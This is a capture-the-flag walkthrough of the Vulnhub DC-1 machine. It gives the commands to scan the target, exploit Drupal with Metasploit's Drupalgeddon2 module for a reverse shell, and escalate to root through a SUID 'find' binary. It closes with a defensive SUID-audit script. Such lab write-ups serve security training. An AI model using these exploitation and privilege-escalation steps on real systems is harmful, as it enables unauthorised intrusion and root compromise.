
DC-1: Vulnhub Walkthrough

lilylily1234

Hello friends! Today we are going to take on another boot2root challenge known as “DC-1: 1”. The credit for making this VM goes to “DCAU”, and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port (80)
  • Finding Drupal CMS
  • Exploiting Drupalgeddon2 to get a reverse shell
  • Finding files with SUID bit set
  • Finding the “find” command with SUID bit set
  • Getting root shell with “find” command
  • Getting final flag

Walkthrough

Let’s start off with scanning the network to find our target.

Code:
netdiscover


We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

Code:
nmap -sV 192.168.1.104


The Nmap output shows us that there are 3 ports open: 22 (SSH), 80 (HTTP), 111 (RPC).

We find that port 80 is running http, so we open the IP in our browser.


When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check whether it is vulnerable to the Drupalgeddon2 exploit. We run the exploit using Metasploit against the target machine and are successfully able to get a reverse shell.

Code:
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

After getting a reverse shell we spawn a TTY shell using python. Then we search for files with the SUID permission on the server and find that the “find” command has the SUID bit set.

Code:
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null


As the “find” command has the SUID bit set, we can execute commands as the “root” user. We create a file called “raj” and use the “find” command to check whether it executes commands as the root user. The reason for creating a file is to have something to use with the “find” command: running it against a single file runs the command only once.

After executing the command “whoami”, we find that we can run commands as the root user. We now execute “/bin/bash” using the “find” command and are successfully able to spawn a shell as the root user. We now go to the /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.

Code:
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;


Author: Sayantan Bera is a technical writer at Hacking Articles and a cybersecurity enthusiast. Contact Here
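
From the defender's side, the same `find / -perm -u=s -type f` enumeration used in the walkthrough doubles as an audit. The script below is an added example, not part of the original walkthrough: it compares every SUID file under a directory against a baseline and reports the rest, which is how a SUID “find” would surface. The `EXPECTED_SUID` list, the function names and the script name are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit SUID files against a baseline (defensive use).
# Assumption: EXPECTED_SUID is a constructed, illustrative baseline of
# basenames; a real baseline should pin full paths and package hashes.
EXPECTED_SUID="passwd su sudo mount umount ping chsh chfn newgrp gpasswd"

# audit_suid ROOT
# Prints one line per SUID regular file under ROOT, using the same
# "-perm -u=s -type f" test as the walkthrough:
#   EXPECTED <path>    basename is in the baseline
#   UNEXPECTED <path>  not in the baseline, e.g. a SUID "find"
audit_suid() {
    find "$1" -perm -u=s -type f 2>/dev/null | sort |
    while IFS= read -r path; do
        verdict=UNEXPECTED
        for ok in $EXPECTED_SUID; do
            if [ "${path##*/}" = "$ok" ]; then
                verdict=EXPECTED
                break
            fi
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# count_unexpected ROOT
# Prints the number of UNEXPECTED findings (0 means the tree matches
# the baseline).
count_unexpected() {
    audit_suid "$1" | grep -c '^UNEXPECTED ' || true
}

# Run as a script: ./suid_audit.sh /   (script name is hypothetical)
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Removing the bit from an unexpected entry with `chmod u-s <path>` closes the escalation path shown in this walkthrough.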
 
